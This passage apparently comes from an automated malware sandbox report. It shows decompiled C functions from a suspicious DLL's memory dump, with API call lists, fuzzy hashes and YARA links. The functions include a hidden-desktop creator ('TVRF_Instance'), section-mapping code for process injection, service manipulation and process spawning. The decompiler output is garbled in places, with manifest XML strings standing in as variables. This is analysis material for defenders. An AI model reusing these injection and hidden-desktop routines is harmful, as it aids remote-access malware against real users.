									_t53 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
									_t37 = HeapAlloc(_t53, _t34, 0x200);
									 *_t58 = _t37;
									if(_t37 == 0) {
										break;
									}
									goto L16;
									L17:
									_t62[4] = _t62[4] + 0x40;
									_t40 = _t40 + 1;
								} while (_t40 <  *((intOrPtr*)(_t60 + 4)));
								_t55 = _t62[5];
								goto L19;
								L20:
								_t60 = _t60 + _t31;
							} while (_t60 != 0);
							goto L22;
						}
					}
				}
				return _t27;
			}

0x6ecab0a0
0x6ecab0ad
0x6ecab0b5
0x6ecab0bf
0x6ecab0c5
0x6ecab0ca
0x6ecab0db
0x6ecab0e1
0x6ecab0e3
0x6ecab0e9
0x6ecab1e1
0x00000000
0x6ecab1e1
0x6ecab103
0x6ecab1d0
0x6ecab1db
0x00000000
0x6ecab114
0x6ecab115
0x6ecab118
0x6ecab121
0x6ecab1bf
0x6ecab1bf
0x6ecab1c4
0x00000000
0x00000000
0x00000000
0x6ecab1c4
0x6ecab127
0x6ecab12c
0x00000000
0x00000000
0x6ecab132
0x6ecab138
0x6ecab140
0x6ecab144
0x6ecab14e
0x00000000
0x00000000
0x6ecab150
0x6ecab154
0x6ecab178
0x6ecab17e
0x6ecab1a5
0x6ecab1aa
0x6ecab1ad
0x00000000
0x6ecab1ad
0x6ecab180
0x6ecab191
0x6ecab199
0x00000000
0x00000000
0x6ecab1a0
0x6ecab1a3
0x00000000
0x6ecab1a3
0x6ecab15b
0x6ecab162
0x6ecab16a
0x6ecab170
0x6ecab174
0x00000000
0x00000000
0x00000000
0x6ecab1b0
0x6ecab1b0
0x6ecab1b5
0x6ecab1b6
0x6ecab1bb
0x00000000
0x6ecab1c6
0x6ecab1c6
0x6ecab1c6
0x00000000
0x6ecab1cf
0x6ecab103
0x6ecab0ca
0x6ecab1e5

APIs

NtQuerySystemInformation.NTDLL ref: 6ECAB0B5
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000), ref: 6ECAB0DB
NtQuerySystemInformation.NTDLL ref: 6ECAB0FC
GetCurrentProcessId.KERNEL32(?,00000000,00000005,00000000,000000FF,000000FF), ref: 6ECAB118
GetCurrentThreadId.KERNEL32 ref: 6ECAB146
HeapAlloc.KERNEL32(00000000,00000000,00000200), ref: 6ECAB16A
HeapReAlloc.KERNEL32(00000000,00000000,00000000,?), ref: 6ECAB191
VirtualFree.KERNEL32(00000000,000000FF,00008000,00000005,00000000,000000FF,000000FF), ref: 6ECAB1DB

Strings

@, xrefs: 6ECAB1B0

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Alloc$CurrentHeapInformationQuerySystemVirtual$FreeProcessThread
String ID: @
API String ID: 494489134-2766056989
Opcode ID: 3af48121ada28f661a5306e579696efc731c0fc18479e8649c97d198fa4e56a4
Instruction ID: 89571226c7097776c97f1913f68e3b3c1f455511612d3e357c4e668d38390974
Opcode Fuzzy Hash: 3af48121ada28f661a5306e579696efc731c0fc18479e8649c97d198fa4e56a4
Instruction Fuzzy Hash: E131197020470AAFE750CF59C995B6B77F9EB85B05F10881CFB9687288E770E901CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA4EF0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81
processnativesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E6ECA4EF0(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				DWORD* _v0;
				signed int _v4;
				signed int _v8;
				CHAR* _v12;
				struct _STARTUPINFOA _v84;
				char _v92;
				void* _v96;
				void* _v100;
				signed int _t17;
				signed int _t23;
				long _t27;
				DWORD* _t30;
				intOrPtr _t33;
				struct _PROCESS_INFORMATION* _t44;

				_t44 =  &_v84;
				_push(0x44);
				_push( &(_v84.dwX));
				L6ECAC2EE();
				_push(0x10);
				_push( &_v92);
				L6ECAC2EE();
				_t17 = _v8;
				_v84.cb = 0x44;
				if(_t17 == 0) {
					_v84.dwFlags = 1;
				}
				_t33 = _a12;
				if(_t33 != 0) {
					_v84.lpDesktop = _t33;
				}
				asm("sbb eax, eax");
				if(CreateProcessA(0, _v12, 0, 0, 0,  ~_t17 & 0x08000000, 0, _a8,  &_v84, _t44) == 0) {
					return 0;
				} else {
					_t23 = _v4;
					if(_t23 != 0) {
						if(_t23 == 0xffffffff) {
							_t27 = _t23 | 0xffffffff;
						} else {
							_t27 = _t23 * 0x3e8;
						}
						if(WaitForSingleObject(_v100, _t27) != 0) {
							if(_a4 != 0) {
								_push(0);
								_push(_v100);
								L6ECAC30C();
							}
						} else {
							_t30 = _v0;
							if(_t30 != 0) {
								GetExitCodeProcess(_v100, _t30);
							}
						}
					}
					CloseHandle(_v96);
					CloseHandle(_v100);
					return 1;
				}
			}

0x6eca4ef0
0x6eca4ef3
0x6eca4ef9
0x6eca4efa
0x6eca4eff
0x6eca4f05
0x6eca4f06
0x6eca4f0b
0x6eca4f0f
0x6eca4f19
0x6eca4f1b
0x6eca4f1b
0x6eca4f23
0x6eca4f29
0x6eca4f2b
0x6eca4f2b
0x6eca4f41
0x6eca4f5e
0x6eca4fd2
0x6eca4f60
0x6eca4f60
0x6eca4f66
0x6eca4f6b
0x6eca4f75
0x6eca4f6d
0x6eca4f6d
0x6eca4f6d
0x6eca4f85
0x6eca4fa1
0x6eca4fa6
0x6eca4fa8
0x6eca4fa9
0x6eca4fa9
0x6eca4f87
0x6eca4f87
0x6eca4f8d
0x6eca4f94
0x6eca4f94
0x6eca4f8d
0x6eca4f85
0x6eca4fba
0x6eca4fc1
0x6eca4fcc
0x6eca4fcc

APIs

RtlZeroMemory.NTDLL(?,00000044), ref: 6ECA4EFA
RtlZeroMemory.NTDLL(00000044,00000010), ref: 6ECA4F06
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,?), ref: 6ECA4F56
WaitForSingleObject.KERNEL32(?,?), ref: 6ECA4F7D
GetExitCodeProcess.KERNEL32 ref: 6ECA4F94
NtTerminateProcess.NTDLL(00000000,00000000), ref: 6ECA4FA9
CloseHandle.KERNEL32(00000044), ref: 6ECA4FBA
CloseHandle.KERNEL32(00000044), ref: 6ECA4FC1

Strings

D, xrefs: 6ECA4F0F

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CloseHandleMemoryZero$CodeCreateExitObjectSingleTerminateWait
String ID: D
API String ID: 2123967418-2746444292
Opcode ID: 5adf518a4f928d979b77ee9d4f40e9589914600757ba32e23648360b87c8ad76
Instruction ID: fc54f15835a614944a7050d713a32e29bd9e09351763d05743f5ae8698b0bb20
Opcode Fuzzy Hash: 5adf518a4f928d979b77ee9d4f40e9589914600757ba32e23648360b87c8ad76
Instruction Fuzzy Hash: 18214C70258302ABE754DBACCD80F5B77E9BB84B05F105A1CBA60CB2C4EB78D805CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA9BD0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA9BD0(void* _a4) {
				struct HDESK__* _t3;
				struct HDESK__* _t9;
				void* _t11;

				_t3 = GetThreadDesktop(GetCurrentThreadId());
				 *0x6ecb0484 = _t3;
				if(_t3 != 0) {
					_t3 = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
					 *0x6ecb0480 = _t3;
					if(_t3 != 0) {
						_t11 = CreateThread(0, 0, E6ECA96D0, _a4, 0, 0);
						if(_t11 != 0) {
							WaitForSingleObject(_t11, 0xffffffff);
							CloseHandle(_t11);
							Sleep(0xfa0);
						}
						_t9 =  *0x6ecb0480; // 0x0
						return CloseDesktop(_t9);
					}
				}
				return _t3;
			}

0x6eca9bd7
0x6eca9bdd
0x6eca9be4
0x6eca9bf8
0x6eca9bfe
0x6eca9c05
0x6eca9c20
0x6eca9c24
0x6eca9c29
0x6eca9c30
0x6eca9c3b
0x6eca9c3b
0x6eca9c41
0x00000000
0x6eca9c4e
0x6eca9c05
0x6eca9c4f

APIs

GetCurrentThreadId.KERNEL32 ref: 6ECA9BD0
GetThreadDesktop.USER32(00000000,?,?,?,?,?,?), ref: 6ECA9BD7
CreateDesktopA.USER32 ref: 6ECA9BF8
CreateThread.KERNEL32 ref: 6ECA9C1A
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?), ref: 6ECA9C29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6ECA9C30
Sleep.KERNEL32(00000FA0,?,?,?,?,?,?), ref: 6ECA9C3B
CloseDesktop.USER32(00000000,?,?,?,?,?,?), ref: 6ECA9C48

Strings

TVRF_Instance, xrefs: 6ECA9BF3

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: DesktopThread$CloseCreate$CurrentHandleObjectSingleSleepWait
String ID: TVRF_Instance
API String ID: 4135746217-3589830093
Opcode ID: cc2880ea7588b068f4e484726336e89166b61439a7da4bee952a26d48a4c3f25
Instruction ID: b406f85969203869f87cd0f0a316d141b488a3ccb20cf53925e8691a21d3ac9d
Opcode Fuzzy Hash: cc2880ea7588b068f4e484726336e89166b61439a7da4bee952a26d48a4c3f25
Instruction Fuzzy Hash: 82F0E171241F12BBEA505BA89F1EF5D3E74BB46B5AF100504FF11AB2C4DB70E4009E55

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA3700, Relevance: 15.1, APIs: 10, Instructions: 76
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA3700(char* _a4, intOrPtr _a8) {
				intOrPtr _v24;
				struct _SERVICE_STATUS _v28;
				int _v32;
				char* _t12;
				void* _t24;
				void* _t28;
				void* _t31;
				int _t32;

				_t32 = 0;
				_v32 = 0;
				_t12 = OpenSCManagerA(0, 0, 0xf003f);
				_t24 = _t12;
				if(_t24 != 0) {
					L2:
					_t28 = OpenServiceA(_t24, _a4, 0xf01ff);
					if(_t28 == 0) {
						L13:
						CloseServiceHandle(_t24);
						L14:
						return _t32;
					}
					QueryServiceStatus(_t28,  &_v28);
					if(_v24 == 1) {
						L9:
						if(_a8 != 0) {
							_v32 = DeleteService(_t28);
						} else {
							_v32 = 1;
						}
						L12:
						CloseServiceHandle(_t28);
						_t32 = _v32;
						goto L13;
					}
					if(ControlService(_t28, 1,  &_v28) == 0) {
						goto L12;
					}
					_t31 = 0;
					while(1) {
						QueryServiceStatus(_t28,  &_v28);
						if(_v24 == 1) {
							goto L9;
						}
						Sleep(0x3e8);
						_t31 = _t31 + 1;
						if(_t31 < 0x3c) {
							continue;
						}
						goto L12;
					}
					goto L9;
				}
				_t24 = OpenSCManagerA(_t12, _t12, 1);
				if(_t24 == 0) {
					goto L14;
				}
				goto L2;
			}

0x6eca370c
0x6eca3715
0x6eca3719
0x6eca371b
0x6eca371f
0x6eca3731
0x6eca3743
0x6eca3747
0x6eca37bf
0x6eca37c0
0x6eca37c8
0x6eca37cf
0x6eca37cf
0x6eca374f
0x6eca375a
0x6eca3798
0x6eca379d
0x6eca37b0
0x6eca379f
0x6eca379f
0x6eca379f
0x6eca37b4
0x6eca37b5
0x6eca37bb
0x00000000
0x6eca37bb
0x6eca376c
0x00000000
0x00000000
0x6eca3774
0x6eca3776
0x6eca377c
0x6eca3787
0x00000000
0x00000000
0x6eca378e
0x6eca3790
0x6eca3794
0x00000000
0x00000000
0x00000000
0x6eca3796
0x00000000
0x6eca3776
0x6eca3727
0x6eca372b
0x00000000
0x00000000
0x00000000

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6ECA3719
OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6ECA3725
OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 6ECA373D
QueryServiceStatus.ADVAPI32(00000000,?), ref: 6ECA374F
ControlService.ADVAPI32(00000000,00000001,?), ref: 6ECA3764
QueryServiceStatus.ADVAPI32(00000000,?), ref: 6ECA377C
Sleep.KERNEL32(000003E8), ref: 6ECA378E
DeleteService.ADVAPI32(00000000), ref: 6ECA37AA
CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA37B5
CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA37C0

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$Open$CloseHandleManagerQueryStatus$ControlDeleteSleep
String ID:
API String ID: 3264530519-0
Opcode ID: 2001ab13a98bfefc65bb5d4ae9b1990e17be755244a584a1b354ab9eca72e87f
Instruction ID: 246206aa663460a152ffc11a8a02abab1ceeb3664a67fd30e72e7400b6b341e0
Opcode Fuzzy Hash: 2001ab13a98bfefc65bb5d4ae9b1990e17be755244a584a1b354ab9eca72e87f
Instruction Fuzzy Hash: 962184B1104707ABD7409FAD8E9CA7F7FBCEB8A705F00091DFA11D6144EB65D8498B62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA37D0, Relevance: 13.6, APIs: 9, Instructions: 80
memoryserviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA37D0(int _a4, char** _a8, int _a12) {
				intOrPtr _v24;
				struct _SERVICE_STATUS _v28;
				int _t14;
				long _t18;
				int _t26;
				void* _t31;
				void* _t33;

				_t31 = _a4;
				if(_t31 == 0) {
					return 0;
				} else {
					_a4 = 0;
					if(QueryServiceConfigA(_t31, 0, 0,  &_a4) != 0) {
						_t18 = _a4;
						_t26 = _t18;
						_t33 = HeapAlloc(GetProcessHeap(), 8, _t18);
						if(_t33 != 0) {
							if(QueryServiceConfigA(_t31, _t33, _t26,  &_a4) != 0 &&  *((intOrPtr*)(_t33 + 4)) != 2) {
								ChangeServiceConfigA(_t31, 0xffffffff, 2, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
							}
							HeapFree(GetProcessHeap(), 0, _t33);
						}
					}
					_t14 = QueryServiceStatus(_t31,  &_v28);
					if(_v24 != 4 || _t14 == 0) {
						StartServiceA(_t31, _a12, _a8);
					}
					return 1;
				}
			}

0x6eca37d4
0x6eca37da
0x6eca3897
0x6eca37e0
0x6eca37f1
0x6eca37fd
0x6eca37ff
0x6eca3808
0x6eca3817
0x6eca381b
0x6eca3829
0x6eca3846
0x6eca3846
0x6eca3856
0x6eca3856
0x6eca385d
0x6eca3864
0x6eca3870
0x6eca3881
0x6eca3881
0x6eca3890
0x6eca3890

APIs

QueryServiceConfigA.ADVAPI32 ref: 6ECA37F9
GetProcessHeap.KERNEL32(00000008,?,00000000,00000000), ref: 6ECA380A
HeapAlloc.KERNEL32(00000000), ref: 6ECA3811
QueryServiceConfigA.ADVAPI32(?,00000000,?,?), ref: 6ECA3825
ChangeServiceConfigA.ADVAPI32(?,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6ECA3846
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA384F
HeapFree.KERNEL32(00000000), ref: 6ECA3856
QueryServiceStatus.ADVAPI32(?,?), ref: 6ECA3864
StartServiceA.ADVAPI32(?,?,?), ref: 6ECA3881

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$Heap$ConfigQuery$Process$AllocChangeFreeStartStatus
String ID:
API String ID: 1115209516-0
Opcode ID: 4e39f44d124fc4c382f57505a31c14cc63639ba235b8e957cff87c02fba8440b
Instruction ID: 0dd0c5ec0a280a7e99a63aa20bda6a5e639d542d06dfe84ca276ad296f58549c
Opcode Fuzzy Hash: 4e39f44d124fc4c382f57505a31c14cc63639ba235b8e957cff87c02fba8440b
Instruction Fuzzy Hash: DD117F71204702BBE7505AAC8D5DF7F7BBCAB85B68F40461DFA6993184E670D801CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA2640, Relevance: 12.1, APIs: 8, Instructions: 98
nativeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E6ECA2640() {
				char _v8;
				void* _v16;
				long _v24;
				void* _v32;
				long _v44;
				void* _v48;
				void* _v56;
				void* _v64;
				long _v80;
				void* _v88;
				void* _v92;
				void* _v120;
				intOrPtr _v132;
				void* _v136;
				void* _v140;
				void* _t45;
				void* _t58;
				intOrPtr _t59;

				_t58 = "embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
				_t59 =  *((intOrPtr*)(_t58 + 0x3c));
				_t45 = 0;
				if( *((intOrPtr*)(_t59 + _t58)) == 0x4550) {
					_push(8);
					_push( &_v8);
					_v24 = 0;
					L6ECAC2EE();
					_v16 =  *(_t59 + _t58 + 0x50);
					if(NtCreateSection( &_v32, 0xe, 0,  &_v16, 0x40, 0x8000000, 0) >= 0) {
						_v48 = 0;
						_v44 = 0;
						if(NtMapViewOfSection(_v56, 0xffffffff,  &_v48, 0, 0, 0,  &_v44, 2, 0, 0x40) >= 0) {
							_v88 = 0;
							if(NtMapViewOfSection(_v92, _v64,  &_v88, 0, 0, 0,  &_v80, 2, 0, 0x40) >= 0) {
								RtlMoveMemory(_v120, _t58,  *(_t59 + _t58 + 0x50));
								if(E6ECA25B0(_v132, _v136) == 0) {
									NtUnmapViewOfSection(_v140, _v136);
								} else {
									_t45 = _v136;
								}
							}
							NtUnmapViewOfSection(0xffffffff, _v120);
						}
						NtClose(_v92);
					}
				}
				return _t45;
			}

0x6eca2646
0x6eca264c
0x6eca264f
0x6eca2658
0x6eca265e
0x6eca2664
0x6eca2665
0x6eca2669
0x6eca2687
0x6eca2692
0x6eca26b1
0x6eca26b5
0x6eca26c0
0x6eca26de
0x6eca26e9
0x6eca26f6
0x6eca270f
0x6eca2721
0x6eca2711
0x6eca2711
0x6eca2711
0x6eca270f
0x6eca272d
0x6eca272d
0x6eca2737
0x6eca2737
0x6eca2692
0x6eca2744

APIs

RtlZeroMemory.NTDLL(?,00000008), ref: 6ECA2669
NtCreateSection.NTDLL ref: 6ECA268B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6ECA26B9
NtMapViewOfSection.NTDLL(08000000,00000000,0000000E,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6ECA26E2
RtlMoveMemory.NTDLL(?,00000000,00000000), ref: 6ECA26F6
NtUnmapViewOfSection.NTDLL(?,?), ref: 6ECA2721
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 6ECA272D
NtClose.NTDLL(?), ref: 6ECA2737

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$View$MemoryUnmap$CloseCreateMoveZero
String ID:
API String ID: 1304417992-0
Opcode ID: 54b238ed8bc42120c225039a1e21a896c4dba2112db8c9ebd1329dba8dc14d84
Instruction ID: ace5b4eddb2893398e9993876e245fc4e1f8ecbe65f9516da53098959c2950fe
Opcode Fuzzy Hash: 54b238ed8bc42120c225039a1e21a896c4dba2112db8c9ebd1329dba8dc14d84
Instruction Fuzzy Hash: 0731FEB5204302BFE204DA99CD90E6BB7ADEBC8758F404E1DB7559B284E770ED048B62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA7790, Relevance: 12.1, APIs: 8, Instructions: 86
threadwindownativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA7790(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _t7;
				void* _t8;
				_Unknown_base(*)()* _t10;
				long _t14;
				void* _t17;
				int _t20;
				void* _t22;
				void* _t24;
				struct HWND__* _t25;
				int _t26;
				void* _t27;

				_t20 = _a12;
				_t26 = _a8;
				_t25 = _a4;
				_t27 = _t26 - 0x16;
				if(_t27 > 0) {
					if(_t26 == 0x18) {
						goto L15;
					} else {
						if(_t26 == 0x112) {
							_t7 = _t20 - 0xf020;
							if(_t7 == 0) {
								goto L15;
							} else {
								_t8 = _t7 - 0x10;
								if(_t8 == 0 || _t8 == 0xf0) {
									goto L15;
								} else {
									goto L19;
								}
							}
						} else {
							if(_t26 != 0x83fc) {
								goto L19;
							} else {
								"one=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t20;
								M6ECB04C0 = CreateThread(0, 0, E6ECA6D50, 0, 0,  &M6ECB04C4);
								goto L15;
							}
						}
					}
				} else {
					if(_t27 == 0) {
						PostMessageA(_t25, 0x10, 0, 0);
						goto L19;
					} else {
						if(_t26 == 3 || _t26 == 7) {
							L15:
							return 0;
						} else {
							if(_t26 == 0x10) {
								M6ECB04B0 = 1;
								if(M6ECB04C0 != 0) {
									_t14 = M6ECB04C4; // 0x0
									PostThreadMessageA(_t14, _t26, 0, 0);
									_t22 = M6ECB04C0; // 0x0
									if(WaitForSingleObject(_t22, 0x1388) != 0) {
										_t24 = M6ECB04C0; // 0x0
										NtTerminateThread(_t24, 0);
									}
									_t17 = M6ECB04C0; // 0x0
									CloseHandle(_t17);
								}
								PostQuitMessage(0);
							}
							L19:
							_t10 = "one=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
							return CallWindowProcW(_t10, _t25, _t26, _t20, _a16);
						}
					}
				}
			}

0x6eca7791
0x6eca7796
0x6eca779b
0x6eca779f
0x6eca77a2
0x6eca7835
0x00000000
0x6eca7837
0x6eca783d
0x6eca7876
0x6eca787b
0x00000000
0x6eca787d
0x6eca787d
0x6eca7880
0x00000000
0x00000000
0x00000000
0x00000000
0x6eca7880
0x6eca783f
0x6eca7845
0x00000000
0x6eca7847
0x6eca785b
0x6eca7867
0x00000000
0x6eca7867
0x6eca7845
0x6eca783d
0x6eca77a8
0x6eca77a8
0x6eca782a
0x00000000
0x6eca77aa
0x6eca77ad
0x6eca786e
0x6eca7871
0x6eca77bc
0x6eca77bf
0x6eca77cc
0x6eca77d6
0x6eca77d8
0x6eca77e3
0x6eca77e9
0x6eca77fd
0x6eca77ff
0x6eca7808
0x6eca7808
0x6eca780d
0x6eca7813
0x6eca7813
0x6eca781b
0x6eca781b
0x6eca7889
0x6eca788d
0x6eca78a0
0x6eca78a0
0x6eca77ad
0x6eca77a8

APIs

PostThreadMessageA.USER32(00000000,?,00000000,00000000), ref: 6ECA77E3
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 6ECA77F5
NtTerminateThread.NTDLL ref: 6ECA7808
CloseHandle.KERNEL32(00000000), ref: 6ECA7813
PostQuitMessage.USER32(00000000), ref: 6ECA781B
PostMessageA.USER32(?,00000010,00000000,00000000), ref: 6ECA782A
CreateThread.KERNEL32 ref: 6ECA7861
CallWindowProcW.USER32(00000000,?,?,?,?), ref: 6ECA7897

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePostThread$CallCloseCreateHandleObjectProcQuitSingleTerminateWaitWindow
String ID:
API String ID: 1229868629-0
Opcode ID: 4fdebfc6ad372e5d454cf9f83ebad16f2c2035aea85b7056f4cb19c9191e6d58
Instruction ID: 507e0650f3801da30db91ce5ba25667fca3f9af771d4705b202a9388ac33da4f
Opcode Fuzzy Hash: 4fdebfc6ad372e5d454cf9f83ebad16f2c2035aea85b7056f4cb19c9191e6d58
